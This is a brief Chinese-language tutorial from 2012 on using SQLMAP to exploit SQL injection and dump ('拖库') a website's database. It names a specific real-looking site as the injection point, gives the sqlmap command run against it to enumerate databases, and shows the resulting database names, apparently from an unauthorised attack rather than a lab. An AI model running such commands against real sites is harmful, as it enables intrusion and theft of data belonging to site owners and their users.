SQLMAP 注入拖库过程
--冰锋刺客
-- 2012-5-31
SQLMAP 是一款开源的渗透测试程序,它可以自动探测和利用 SQL 注入漏洞来获得我们想
要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它
利用注入点拖库的速率还是灰常让人满意的。
渗透开始-->
注入点: http://so.126disk.com/search?key=A
测试环境: BackTrack 5 / SQLMAP 0.9
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dbs
// 列举数据库 --> 126disk , information_schema
- 1
- 2
前往页